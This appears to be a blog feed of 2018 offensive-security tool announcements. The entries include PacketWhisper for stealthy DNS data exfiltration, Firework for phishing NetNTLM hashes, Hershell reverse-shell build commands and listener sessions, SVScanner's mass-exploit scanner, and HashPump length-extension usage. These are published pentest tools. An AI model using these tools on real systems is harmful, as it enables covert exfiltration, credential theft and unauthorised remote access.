PacketWhisper - Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography

September 10, 2018, 2:13 pm

≫ Next: Firework - Leveraging Microsoft Workspaces in a Penetration Test

≪ Previous: Web-Traffic-Generator - A Quick And Dirty HTTP/S "Organic" Traffic Generator

PacketWhisper - Stealthily Transfer Data & Defeat Attribution Using DNS Queries & Text-Based Steganography, without the need for attacker-controlled Name Servers or domains; Evade DLP/MLS Devices; Defeat Data- & DNS Name Server Whitelisting Controls. Convert any file type (e.g. executables, Office, Zip, images) into a list of Fully Qualified Domain Names (FQDNs), use DNS queries to transfer data. Simple yet extremely effective.

Author

Joe Gervais (TryCatchHCF)

Why is this different from every other DNS exfiltration technique?

Traditional DNS exfiltration relies on one of the following: DNS tunneling; Hiding data in DNS query fields; or Encoded / encrypted payloads that are broken up and used as subdomains in the DNS query. All of these methods require that the attacker control a domain and/or an associated DNS Name Server to receive the data, which leads to attribution. Those approaches are also vulnerable to DNS Name Server blacklisting (common) and whitelisting (increasingly common). Another problem is that DFIR analysts are familiar with these methods, and SIEM systems will often detect and alert on seeing them.

PacketWhisper overcomes these limitations.

What if data could be transferred using the target's own whitelisted DNS servers, without the communicating systems ever directly connecting to each other or to a common endpoint? Even if the network boundary employed data whitelisting to block data exfiltration?

How It Works

To make it all happen, PacketWhisper combines DNS queries with text-based steganography. Leveraging the Cloakify Toolset, it transforms the payload into a list of FQDN strings. PacketWhisper then uses the list of FQDNs to create sequential DNS queries, transferring the payload across (or within) network boundaries, with the data hidden in plain sight, and without the two systems ever directly connecting to a each other or to a common endpoint. The ciphers used by PacketWhisper provide multiple levels of deception to avoid generating alerts as well as to mislead analysis attempts.

To receive the data, you capture the network traffic containing the DNS queries, using whatever method is most convenient for you. (See "Capturing The PCAP File" below for examples of capture points.) You then load the captured PCAP file into PacketWhisper (running on whatever system is convenient), which extracts the payload from the file and Decloakifies it into its original form.

DNS is an attractive protocol to use because, even though it's a relatively slow means of transferring data, DNS is almost always allowed across network boundaries, even on the most sensitive networks.

Important note: We're using DNS queries to transfer the data, not successful DNS lookups. PacketWhisper never needs to successfully resolve any of its DNS queries. In fact PacketWhisper doesn't even look at the DNS responses. This expands our use cases, and underscores the fact that we never need to control a domain we're querying for, never need to control a DNS Name Server handling DNS requests.

So using PacketWhisper, we transform a payload that looks like this:

Into a list of FQDNs like this:

Which PacketWhisper turns into DNS queries that show up in network traffic like this:

Which you capture as a PCAP file anywhere along the DNS resolution path, and then load that PCAP into your local copy of PacketWhisper to recover the payload:

Tutorial

See the DEF CON 26 slides (included in project) from my Packet Hacking Village presentation. The slides present background on DNS exfiltration, text-based steganography / Cloakify Toolset, and how PacketWhisper combines them all into a method for transferring data. I specifically created the slides to be useful on their own, so the background and information should be complete. However you can also view the video of my DC26 Packet Hacking Village presentation which provides additional context. [NOTE: Video should be online sometime in September, at which point I'll add the URL here.]

I've included a sample PCAP file in the project (cleverly named "sample.pcap") that contains separate payloads for each of the ciphers. They could have been any filetype, of course, but in this case I just transmitted text files into the PCAP. Load it up in PacketWhisper and give it a try!

As a quick test in your own environment, run PacketWhisper from a VM, then send a file while doing a packet capture on the VM's network interface via the host system. You can then load the PCAP file into whichever PacketWhisper instance is convenient to decode the file. Just remember it's not a speedy transfer. Smaller files and patience are your friend.

Requires

Python 2.7.x (3.6.x port is underway)
For decoding payloads: tcpdump (included on Linux & MacOS) or WinDump (Windows)

Question: "Why didn't you use Scapy or dnspython toolset?"

Answer: I hate project dependencies in my operational tools. I keep my projects as atomic, self-contained as possible for maximum reliability, especially on the client side where I may not control the environment and/or have minimal privileges. The way PacketWhisper is structured, I can get it running on a limited shell host just by tar'ing up the project and extracting on the target host.

Question: "Why isn't PacketWhisper a project fork of Cloakify Toolset?"

Answer: Same answer as above. We only need a very specific subset of Cloakify's capabilities, and adding everything else to PacketWhisper would just lead to a cluttered directory and tools/ciphers that can't be used by PacketWhisper. Since I own both projects, I promise to synchronize any changes between the two.

Run PacketWhisper

$ python packetWhisper.py

FQDN-Based Ciphers

FQDN-based ciphers consist of 3 categories:

Unique Random Subdomain FQDNs (Recommended - avoids DNS caching, overcomes NAT)
Unique Repeating FQDNs (DNS may cache, but overcomes NAT)
Common Website FQDNs (DNS caching may block, NAT interferes)

Unique Random Subdomain FQDNs

RECOMMENDED CIPHER MODE FOR MOST USE CASES

These are FQDNs with randomized elements built into the subdomains. This helps prevent DNS caching, while also allowing us to transfer data beyond a NAT'd network devices that may be along the DNS query path. Since the sending system's IP address isn't available beyond the NAT device, the cipher-generated subdomains contain unique tag elements to help us identify PacketWhisper payloads in the packet capture.

These ciphers mimic the formats of various services that rely on complex subdomains as a means to identify a session, user, cached content etc. This approach helps PacketWhisper's DNS queries blend in with the rest of the network's traffic.

The first part of the subdomain name is actually a string from the cipher list. The rest of the subdomain name is randomized to make each FQDN unique, which prevents DNS caching from shutting down the DNS query path prematurely. We then add the domain name. We construct the FQDNs this way to look like the usual FQDNs associated with the selected domain, to blend in better with normal webtraffic seen on any network.

Unique Repeating FQDNs

Created to stand out from all other DNS queries on the network, but without any randomization involved. This means that DNS caching may interfere, but as a side benefit your DNS queries will be easy for you to find even in the largest collection of multi-client pcaps. This is due to the fact that the FQDNs are odd endpoints, like the list of "Johns" (Red Lectroid aliens) at the fictional Yoyodyne Propulsion Systems from the movie 'Buckaroo Banzai Across the 8th Dimension'.

Common Website FQDNs

These are FQDNs constructed out of common Website URLs.

NOTE: Since most environments are NAT'd at the perimeter (removing visibility of client's IP address), this mode is generally only useful for transferring data between systems connected to the same local /24 network (for example, the guest wifi at your favorite coffee shop).

Since Common Website ciphers only have the source IP address as a way to distinguish its queries from all the other similar DNS queries on the network, PacketWhisper will transmit a unique "knock sequence" DNS query at beginning and end of the payload, which helps us pick out the transmitting host from the pcap file later.

Example FQDN: www.github.com

Transmitting the Cloakified Payload

Once you've selected a cipher, PacketWhisper encodes (Cloakifies) the payload into a list of FQDN strings per the desired cipher. It then sequentially generates DNS requests to send the data along the DNS resolution path. PacketWhisper adds a small delay between each DNS query, which helps prevent out-of-order DNS requests.

Capturing the PCAP File

The key element here is of course being able to capture the network traffic containing the DNS queries that PacketWhisper generated. There are a lot of options, since you only need to be somewhere, anywhere, with visibility to the DNS query path.

Example Points of Capture:

Connected to the same local network (e.g. your local coffee shop)
Systems and devices that are internal to the organization
Perimeter network appliances
Network infrastructure outside of the organization
Network tap anywhere along the query path

Use your imagination. Any device along the DNS resolution path is an option, including wall displays. "Wait, what?"

NOTE: VPN connections block visibility between host and VPN exit node. If the client you're transferring from has an active VPN connection, you won't be able to see any DNS queries unless you can capture upstream from the VPN exit node. Even capturing on the same system will fail. Since many of you are probably using VPNs, if you want to test out PacketWhisper, try transmitting from a hosted virtual machine (VM) and capture the traffic on the VM's network interface on the host system.

Extracting The Payload

Once you've captured the pcap file, recover the payload by running PacketWhisper on a system that has tcpdump (included on Linux & MacOS) or WinDump (Windows) installed. PacketWhisper will ask you which cipher was used, then extract the payload from the pcap, and finally decode the extracted payload with the matching cipher.

Important note: Within the same PCAP, you can transmit one payload per cipher used. A PCAP containing more than one payload using the same cipher will cause problems. For example my supplied 'example.pcap' file contains 5 payloads, one for each of the operational ciphers currently available. If one of the payloads had used the same cipher as another one, PacketWhisper will fail to extract either of them. The easy fix is to break up the PCAP file (this is why the PacketWhisper transmit code prints out the UTC date-time when starting and ending transmission). I'm working on allowing multiple payloads using the same cipher, solution is already in place, I just need to get around to it.

Limitations / Use Notes

Be sure your PCAP file is actually PCAP format. If you used tcpdump or WinDump to capture the file you'll be fine. Wireshark however offers a wide variety of "Save As..." options for saving Wireshark traffic, only one of which is actually tcpdump/PCAP friendly. I'm working on better error reporting to help catch mistakes early.

Not a secure encryption scheme. PacketWhisper is not a secure encryption scheme. It's vulnerable to frequency analysis attacks. Use the 'Unique Random Subdomain FQDNs' category of ciphers to add entropy and help degrade frequency analysis attacks. If payload secrecy is required, be sure to encrypt the payload before using PacketWhisper to process it.

Not a high-bandwidth transfer method. PacketWhisper relies on DNS queries, which are UDP-based, meaning order of delivery (or even successful delivery) of the request is not guaranteed. PacketWhisper by default adds a small (1/2-second) delay between each DNS query. You can safely transfer payloads at a rate of about 7.2K per hour (120 bytes per minute). That's based on the size of the original payload, not the Cloakified output file. You can opt for no delay between between queries, which dramatically speeds up the transfer but at the risk of increased network noise and corrupted payload.

And let's face it, if you have non-DNS modes of data transfer available, you can just use the main Cloakify Toolset project to hide the file in plain sight (maybe turn the payload into a list of PokemonGo monsters w/ LatLon coordinates) and use all that high bandwidth available via FTP/HTTP/etc. DNS is extremely useful when other protocols are blocked, but always be aware of your options.

DNS is DNS. Different OS's have different DNS caching policies, etc. Networks may be down, isolated, etc. PacketWhisper includes a quick manual check to see if it can resolve common FQDNs, but DNS is often a messy business. Remember the old IT troubleshooting mantra: "It's always DNS."

Detection / Prevention

See the DEF CON 26 slides (included in project) from my Packet Hacking Village presentation. Mitigation strategies are covered toward the end of the presentation. As in all things, "Security In Depth" is your friend, especially since DNS resolution paths span vast amounts of terrain that are outside of your organization's control.

Download PacketWhisper

↧

Firework - Leveraging Microsoft Workspaces in a Penetration Test

September 11, 2018, 5:23 am

≫ Next: MobSF (Mobile Security Framework) v1.0 - Mobile (Android/iOS) Automated Pen-Testing Framework

≪ Previous: PacketWhisper - Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography

Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. The tool also wraps some code from Responder to leverage its ability to capture NetNTLM hashes from a system that provisions a Workplace feed via it.

This tool may be used as part of a penetration test or red team exercise to create a .wcx payload (and associated feed) that if clicked on could be used to:

Phish for credentials - NetNTLM hashes will be sent if a user enters their credentials (or on older versions of Windows automatically).
Add items to the Start-Menu - After set-up shortcuts are added to the Start-Menu which launch the served RDP file(s). These entries could potentially be used as part of a wider social engineering campaign.
Download resources - Resources such as the .rdp files and icon files are downloaded and updated by Windows on a daily basis (if authentication of the feed is disabled or is satisfied).

Read the SpiderLabs blog for a more detailed summary and walk through.

Installation

Tested with Python 2.7.x. (Python3 not currently supported, although the main Firework class could be used in Python 3)

$ pip install -r requirements.txt

The tool serves content over HTTPS and requires a certificate and private key to use in-built web server with NetNTLM capture. Default files: cert.crt and key.pem

Usage


.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

Examples
Basic example:

Organisation Name: EvilCorp
URL to feed XML (or URL to Firework's in-built server): https://example.org/ - This is where Windows downloads the feed from.
Application Name: Firework
File Extension: .fwk
Icon File: firework.ico

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico

In built web server will start on port 443 if cert.crt and key.pem are present in current directory. This will force an NTLM challenge with responder. If these files are not present the tool will write all files to local directory for your own hosting.
If you wish to start the in-built web server on alternate port use the -l flag as below:

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443

You can also add some customisations to the .rdp file that gets served.

Remote Desktop Server: dc.corp.local
Domain: corp.local
Username: admin
Password Crypt: Encrypted password that gets included in RDP file

Note: Passwords stored in .rdp files are likely ignored in a default config.

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload
Having run the tool 'payload.wcx' will be written to current directory. This file is what when clicked on starts the provisioning process.

Authors

David Middlehurst - Twitter- @dtmsecurity

Download Firework

↧

MobSF (Mobile Security Framework) v1.0 - Mobile (Android/iOS) Automated Pen-Testing Framework

September 11, 2018, 2:34 pm

≫ Next: Ettercap - A Comprehensive Suite For Man In The Middle Attacks

≪ Previous: Firework - Leveraging Microsoft Workspaces in a Penetration Test

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and support both binaries (APK, IPA & APPX ) and zipped source code. MobSF can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz, a Web API specific security scanner. MobSF is designed to make your CI/CD or DevSecOps pipeline integration seamless.

MobSF is also bundled with Android Tamer and BlackArch

Documentation

See MobSF Documentation

MobSF Static Analyzer Docker Image
Automated prebuilt docker image of MobSF Static Analyzer is available from DockerHub

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

Other docker options: MobSF Docker Options

Collaborators

Presentations

OWASP APPSEC EU 2016 - Slides, Video
NULLCON 2016 - Slides
c0c0n 2015 - Slides
OWASP AppSec EU 2016 - Video
G4H Webcast 2015 - Video

Video Course

What's New?

See Changelog

Screenshots

Static Analysis - Android APK

Static Analysis - iOS IPA

Static Analysis - Windows APPX

Dynamic Analysis - Android APK

Web API Fuzzer

Credits

Abhinav Sejpal (@Abhinav_Sejpal) - For poking me with bugs, feature requests, and UI & UX suggestions.
Amrutha VC (@amruthavc) - For the new MobSF logo
Anant Srivastava (@anantshri) - For Activity Tester Idea
Anto Joseph (@antojosep007) - For the help with SuperSU.
Bharadwaj Machiraju (@tunnelshade_) - For writing pyWebProxy from scratch
Dominik Schlecht - For the awesome work on adding Windows Phone App Static Analysis to MobSF
Esteban - Better Android Manifest Analysis and Static Analysis Improvement.
Matan Dobrushin - For adding Android ARM Emulator support to MobSF - Special thanks goes for cuckoo-droid, I got inspierd by their code and idea for this implementation.
MindMac - For writing Android Blue Pill
Rahul (@c0dist) - Kali Support
Shuxin - Android Binary Analysis
Thomas Abraham - For JS Hacks on UI.
Tim Brown (@timb_machine) - For the iOS Binary Analysis Ruleset.
Oscar Alfonso Diaz - (@OscarAkaElvis) - For Dockerfile contributions

Download MobSF

↧

Ettercap - A Comprehensive Suite For Man In The Middle Attacks

September 12, 2018, 5:48 am

≫ Next: Parrot Security 4.2.2 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

≪ Previous: MobSF (Mobile Security Framework) v1.0 - Mobile (Android/iOS) Automated Pen-Testing Framework

Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

ETTERCAP OFFERS THREE INTERFACES, TRADITIONAL COMMAND LINE, GUI AND NCURSES.

Supported Distributions

These distributions have been tested in both 32 and 64 bit flavors where possible

Debian/Ubuntu (Includes derivatives such as Kali, BackTrack, Mint, etc)
Fedora
Gentoo
Pentoo
Mac OSX (Snow Leopard & Lion)
FreeBSD
OpenBSD
NetBSD

Unsupported Distributions

Installation may work on the following distributions, but are not supported. Additional settings may be required for compilation and/or use

OpenSuSe
Solaris
Windows Vista
Windows 7
Windows 8

Dependencies

Ettercap source compilation requires the following dependencies

Libpcap & dev libraries
Libnet1 & dev libraries
Libpthread & dev libraries
Zlibc
Libtool
CMake 2.6
Flex
Bison
SSL Dissection Required Dependencies
- LibSSL & dev libraries
GTK Related Dependencies
- LibGTK & dev libraries
NCurses Related Dependencies
- Libncurses & dev libraries
Filter Related Regex Dependencies

Libpcre & dev libraries

When building from source, dependencies should be found in the supported distribution repositories. Try these first before acquiring from external dependency source pages. All supported builds have been tested with dependencies installed from the distribution repository.

If you are running on debian, or any debian based distro you can install the required dependencies by running:

sudo apt-get install debhelper cmake bison flex libgtk2.0-dev libltdl3-dev libncurses-dev libncurses5-dev\
 libnet1-dev libpcap-dev libpcre3-dev libssl-dev libcurl4-openssl-dev ghostscript

For running ettercap you might need to install ethtool, needed for disabling interface offloads.

Download Ettercap

↧

Parrot Security 4.2.2 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

September 12, 2018, 1:35 pm

≫ Next: Hershell - Simple TCP reverse shell written in Go

≪ Previous: Ettercap - A Comprehensive Suite For Man In The Middle Attacks

Updated kernel and core packages

Parrot 4.2 is powered by the latest Linux 4.18 debianized kernel with all the usual wireless patches.

A new version of the Debian-Installer now powers our netinstall images and the standard Parrot images.

Firmware packages were updated to add broader hardware support, including wireless devices and AMD vega graphics.

AppArmor and Firejail profiles were adjusted to offer a good compromise of security and usability for most of the desktop and CLI applications and services.

Important destkop updates

Parrot 4.2 now provides the latest libreoffice 6.1 release, Firefox 62 and many other important updates.

Desktop users will also find useful the inclusion of default .vimrc and .emacs config files with syntax highlight and line number columns.

Important tools updates

Armitage was finally updated and fixed, and the “missing RHOSTS error” was fixed.

We also imported the latest Metasploit 4.17.11 version. Wireshark 2.6, hashcat 4.2, edb-debugger 1.0 and many many other updated tools.

New documentation portal

The new documentation portal can be visited here https://www.parrotsec.org/docs. feel free to contribute and expand the documentation by sending a push request on https://dev.parrotsec.org/parrot/documentation.

Download Parrot Security 4.2.2

↧

Hershell - Simple TCP reverse shell written in Go

September 13, 2018, 5:23 am

≫ Next: VBScan 0.1.8 - Black Box vBulletin Vulnerability Scanner

≪ Previous: Parrot Security 4.2.2 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.

Supported OS are:

Windows
Linux
Mac OS
FreeBSD and derivatives

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell, which can work on multiple systems,

How ?
Since it's written in Go, you can cross compile the source for the desired architecture.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:

GOOS : the target OS
GOARCH : the target architecture
LHOST : the attacker IP or domain name
LPORT : the listener port

For the GOOS and GOARCH variables, you can get the allowed values here.
However, some helper targets are available in the Makefile:

depends : generate the server certificate (required for the reverse shell)
windows32 : builds a windows 32 bits executable (PE 32 bits)
windows64 : builds a windows 64 bits executable (PE 64 bits)
linux32 : builds a linux 32 bits executable (ELF 32 bits)
linux64 : builds a linux 64 bits executable (ELF 64 bits)
macos : builds a mac os 64 bits executable (Mach-O)

For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:

run_shell : drops you an system shell (allowing you, for example, to change directories)
inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment)
meterpreter IP:PORT : connects to a multi/handler to get a stage2 reverse tcp meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
exit : exit gracefully

Examples
First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=sysdream.com/O=Sysdream/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

For windows:

# Custom target
$ make GOOS=windows GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined target
$ make windows32 LHOST=192.168.0.12 LPORT=1234

For Linux:

# Custom target
$ make GOOS=linux GOARCH=amd64 LHOST=192.168.0.12 LPORT=1234
# Predifined target
$ make linux32 LHOST=192.168.0.12 LPORT=1234

For Mac OS X

$ make macos LHOST=192.168.0.12 LPORT=1234

Listeners
On the server side, you can use the openssl integrated TLS server:

$ openssl s_server -cert server.pem -key server.key -accept 1234
Using default temp DH parameters
ACCEPT
bad gethostbyaddr
-----BEGIN SSL SESSION PARAMETERS-----
MHUCAQECAgMDBALALwQgsR3QwizJziqh4Ps3i+xHQKs9lvp5RfsYPWjEDB68Z4kE
MHnP0OD99CHv2u27THKvCHCggKEpgrPnKH+vNGJGPJZ42QylfkekhSwY5Mtr5qYI
5qEGAgRYgSfgogQCAgEspAYEBAEAAAA=
-----END SSL SESSION PARAMETERS-----
Shared ciphers:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA:AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:DES-CBC3-SHA
Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Shared Signature Algorithms: RSA+SHA256:ECDSA+SHA256:RSA+SHA384:ECDSA+SHA384:RSA+SHA1:ECDSA+SHA1
Supported Elliptic Curve Point Formats: uncompressed
Supported Elliptic Curves: P-256:P-384:P-521
Shared Elliptic curves: P-256:P-384:P-521
CIPHER is ECDHE-RSA-AES128-GCM-SHA256
Secure Renegotiation IS supported
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\LAB2\Downloads>

Or even better, use socat with its readline module, which gives you a handy history feature:

$ socat readline openssl-listen:1234,fork,reuseaddr,verify=0,cert=server.pem
Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\LAB2\Downloads>

Or, and this is great, use a metasploit handler:

[172.17.0.2][Sessions: 0][Jobs: 0]: > use exploit/multi/handler
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set payload python/shell_reverse_tcp_ssl
payload => python/shell_reverse_tcp_ssl
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lhost 192.168.122.1
lhost => 192.168.122.1
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set lport 4444
lport => 4444
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set handlersslcert /tmp/data/server.pem
handlersslcert => /tmp/data/server.pem
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > set exitonsession false
exitonsession => false
[172.17.0.2][Sessions: 0][Jobs: 0]: exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 192.168.122.1:4444
[*] Started reverse SSL handler on 0.0.0.0:4444
[*] Starting the payload handler...
[172.17.0.2][Sessions: 0][Jobs: 1]: exploit(handler) >
[*] Command shell session 1 opened (172.17.0.2:4444 -> 172.17.0.1:51995) at 2017-02-09 12:07:51 +0000
[172.17.0.2][Sessions: 1][Jobs: 1]: exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [version 10.0.10586]
(c) 2015 Microsoft Corporation. Tous droits rservs.

C:\Users\lab1\Downloads>whoami
whoami
desktop-jcfs2ok\lab1

C:\Users\lab1\Downloads>

Credits
Ronan Kervella <r.kervella -at- sysdream -dot- com>

Download Hershell

↧

VBScan 0.1.8 - Black Box vBulletin Vulnerability Scanner

September 13, 2018, 1:47 pm

≫ Next: Telegram Vulners Bot - Exploit Search Engine And Security Feed In Your Pocket

≪ Previous: Hershell - Simple TCP reverse shell written in Go

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them .

Why OWASP VBScan ?

If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

Project Leader : Mohammad Reza Espargham
Github : https://github.com/rezasp/vbscan/
SourceForge : https://sourceforge.net/projects/vbscan/
OWASP Page : https://www.owasp.org/index.php/OWASP_VBScan_Project

usage :

./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

OWASP VBScan 0.1.7 introduction

What’s New in Version 0.1.8 [Self Challenge]

Updated vulnerabilities database
"Email Before Registration Plugin" SQL exploit added
"Tapatalk vbulletin plugin" exploit added
"Routestring RCE" exploit added
Vbulletin possible password logger detector added
Allow start from any path
OpenRedirection founder module added
Vbulletin version comparing module added
A few enhancements

Download VBScan

↧

Telegram Vulners Bot - Exploit Search Engine And Security Feed In Your Pocket

September 14, 2018, 5:14 am

≫ Next: SVScanner - Scanner Vulnerability And Massive Exploit

≪ Previous: VBScan 0.1.8 - Black Box vBulletin Vulnerability Scanner

Vulners Bot is a Telegram interface for popular vulnerability database.

It gives you availability of searching for exploits, tools, patches and many more using Telegram inline queries.

But the most powerful feature is customizable security subscriptions feeds.

You can select predefined themes or create your own and receive updates in any preferred schedule.

Like "Exploit updates" every day at 10 AM, "Security News" as fast as the arrive at Vulners database, "Fresh CVE" every week and any other custom scenario you can imagine. Filter the flood of the new information in the way you want.

RSS time are gone. Now bots rule the feeds :)

Join Telegram Vulners Bot

↧

SVScanner - Scanner Vulnerability And Massive Exploit

September 14, 2018, 2:59 pm

≫ Next: HashPump - A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms

≪ Previous: Telegram Vulners Bot - Exploit Search Engine And Security Feed In Your Pocket

Is a tool for scanning and massive exploits. Our tools target several open source cms.

Getting Started with Linux

git clone https://github.com/radenvodka/SVScanner.git
cd SVScanner
php svscanner.php

Getting Started with Windows

Download Xampp (PHP7)
Download SVScanner : https://github.com/radenvodka/SVScanner/releases
and open with cmd php svscanner.php

Systems we recommend :

PHP 7 (version and up)
Install Modules PHP : php-cli & php-curl for linux

Credits

Edo Maland (Powerstager) https://github.com/Screetsec
Jack Wilder admin in http://www.linuxsec.org

Want to contribute
Send the target live and what exploits are used. then send to maunikah1337@gmail.com

Download SVScanner

↧

HashPump - A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms

September 15, 2018, 5:53 am

≫ Next: Wildpwn - Unix Wildcard Attack Tool

≪ Previous: SVScanner - Scanner Vulnerability And Massive Exploit

A tool to exploit the hash length extension attack in various hashing algorithms.
Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Help Menu

$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
    HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
    -h --help          Display this message.
    -t --test          Run tests to verify each algorithm is operating properly.
    -s --signature     The signature from known message.
    -d --data          The data from the known message.
    -a --additional    The information you would like to add to the known message.
    -k --keylength     The length in bytes of the key being used to sign the original message with.
    Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
<Developed by bwall(@botnet_hunter)>

Sample Output

$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

Compile & install

$ git clone https://github.com/bwall/HashPump.git
$ apt-get install g++ libssl-dev
$ cd HashPump
$ make
$ make install

apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.
On OS X HashPump can also be installed using Homebrew:

$ brew install hashpump

Mentions
HashPump has been mentioned in a few write-ups. If you are wondering how you can use HashPump, these are some great examples.

Python Bindings
Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy. This addition comes from zachriggle.

Installation
These Python bindings are available on PyPI and can be installed via pip. pip install hashpumpy

Usage

>>> import hashpumpy
>>> help(hashpumpy.hashpump)
Help on built-in function hashpump in module hashpumpy:

hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
        hexdigest(str):      Hex-encoded result of hashing key + original_data.
        original_data(str):  Known data used to get the hash result hexdigest.
        data_to_add(str):    Data to append
        key_length(int):     Length of unknown data prepended to the hash

    Returns:
        A tuple containing the new hex digest and the new message.
>>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
('e3c4a05f', 'original_datadata_to_add')

Python 3 note
hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.

Download HashPump

↧

Wildpwn - Unix Wildcard Attack Tool

September 15, 2018, 2:07 pm

≫ Next: Phishing-Frenzy - Ruby On Rails Phishing Framework

